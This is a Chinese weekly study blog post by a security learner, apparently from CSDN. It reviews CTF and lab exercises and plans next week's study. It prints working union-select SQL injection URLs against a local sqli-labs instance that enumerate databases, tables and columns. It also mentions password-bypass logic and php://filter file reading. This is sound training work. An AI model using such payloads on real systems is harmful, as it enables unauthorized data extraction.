本周博客重点讨论了SQL注入,包括数字型和字符型注入,利用万能密码进行绕过。分享了爆库、爆表和爆字段的实战例子,并提及了SecretFile的解决方法,涉及php伪协议。此外,还提到了PHP学习的进展和下周的学习计划,包括深入学习PHP和文件上传靶场的实践。
目录
完成事项
一、每周需要写的题目
这一周的博客记录了4道题,其中有两道是sql注入,另外的是一道简单的php和一个信息泄露?(不确定是哪种类型的题目)同时还涉及到了文件包含的漏洞。
sql的两道题目
第一道主要还是和万能密码有关,比较简单,第二题是sql注入,还是爆库,爆表,爆字段。有一段时间没去靶场练习sql了,所以写题时有点费脑子,不过按照以往的步骤还是写出来了。
爆库
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,database()–+爆表
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
爆字段
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’–+
还有一个就是Secret File
前面还是看源代码,后面是burp抓包,最后就是php伪协议,这个php伪协议了解了一点,但不是特别了解,因为写题根本没想到,还是看别人的博客才知道的,这一题是用php://fileter伪协议来获取文件,所以php伪协议还需要了解。
havefun有点简单就不说了。
二、SQL注入点判断及万能密码
sql注入主要还是数字型和字符型,以及注入时or,and,xor等的运用进行注入。然后就是万能密码是根据过滤,运用逻辑运算符进行绕过但是csdn上讲的非常多,所以有点不明白这个是怎么判断数据库对什么进行了过滤。
三、未办事项
php的继续学习,最近课有点多,晚上来工作室的时间少,所以php进程较前两周很慢。
下周代做
- 写题
- 学习php,详细了解php伪协议
- 文件上传,打upload靶场
- 加固sql注入
扫一扫
1817
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
